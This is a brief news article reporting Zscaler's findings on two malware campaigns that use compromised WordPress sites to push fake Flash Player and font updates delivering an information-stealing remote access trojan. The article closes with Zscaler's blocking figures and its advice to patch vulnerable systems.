Tech security company Zscaler has discovered two hacking campaigns designed to trick users into downloading malware.
The two malware campaigns “deliver a payload designed to steal sensitive information,” the firm said in a blog post. Zscaler explained that the first version of the campaign enables malicious parties to break into insecure WordPress sites using the theme plugin vulnerability.
From there, cybercriminals can install malicious redirect scripts into the site. The hackers are then able to display a phony Flash Player update alert on the page, which tricks those who visit the site into clicking the 'Update' button and unwittingly downloading the malicious file -- even if they attempt to delay the update.
“If the user clicks the ‘Later’ button, the redirect still occurs, taking the user to the same page to download the malicious HTA file,” Zscaler noted.
Once installed, the Remote Access Trojan (RAT) malware will send the victim's information in an encrypted format to the attacker's site, allowing remote access to the victim's computer.
In another version of the campaign, the cybercriminal “will directly inject the fake update template script by exploiting the legitimate site to evade detection,” Zscaler explained.
When a user tries to access the compromised site via Chrome, they will receive an alert that the ‘PT Sans’ font wasn’t found, and they’ll be asked to update again.
In total, the Zscaler team said it has blocked more than 40,000 malicious attacks related to this campaign in the past three months. The company recommends updating the systems that are vulnerable to the attacks.
“In today's digital world, a company's website is its most valuable asset,” the firm concluded. “Therefore, it is critically important for companies to protect this public face from an attack that could put your business, employees, and your customers at risk.”